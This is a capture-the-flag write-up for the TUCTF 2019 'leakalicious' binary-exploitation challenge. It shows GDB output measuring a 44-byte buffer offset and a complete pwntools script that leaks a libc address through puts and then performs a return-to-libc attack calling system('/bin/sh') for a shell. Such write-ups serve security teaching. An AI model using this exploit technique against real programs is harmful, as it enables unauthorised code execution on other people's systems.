TUCTF2019 leakalicious writeup

<leakalicious>

 

Description

King Arthur has proposed this challenge for all those who consider themselves worthy.

 

Hint

BLUKAT ME! If only we knew what libc to use...

---

Let's pwn 🙂

 

 

then, first We can not use shellcode

but I get a hint on IDA

What... version of libc am I using?

 

I thought we should RTL 

Then, let's put the pieces for attack

 

If we put A 31 times, e can leak puts function address
Next, we need to know distance from buffuer to RET
we have breakpoint in GDB

1. starting point

2. after read function

gdb-peda$ i r esp

esp            0xffffd41c    0xffffd41c

 

gdb-peda$ x/40wx $esp

0xffffd3e4:    0x00000000    0xffffd3f0    0x00000040    0x41414141

0xffffd3f4:    0x41414141    0xffff0a41    0x565562ab    0xf7fe59b0

 

gdb-peda$ p/d 0xffffd41c - 0xffffd3f0

$3 = 44

 

 

exploit

from pwn import *
 
libc = ELF('/lib/i386-linux-gnu/libc-2.27.so')    // my library
r = process("./leakalicious")
 
r.sendlineafter('> ', 'A'*31)
print r.recvline()
 
libc_base = u32(r.recvline()[:-2]) - libc.symbols['puts']
log.info("libc_base is : " + str(hex(libc_base)))
 
system_addr = libc_base + libc.symbols['system']
binsh_addr = libc_base + libc.search('/bin/sh').next()
 
log.info('system addr is : ' + hex(system_addr))
log.info('/bin/sh addr is ' + hex(binsh_addr))
 
r.sendlineafter('> ', 'A')
r.sendlineafter('> ', 'A'*44 + p32(system_addr) + 'A'*4 + p32(binsh_addr))
 
r.interactive()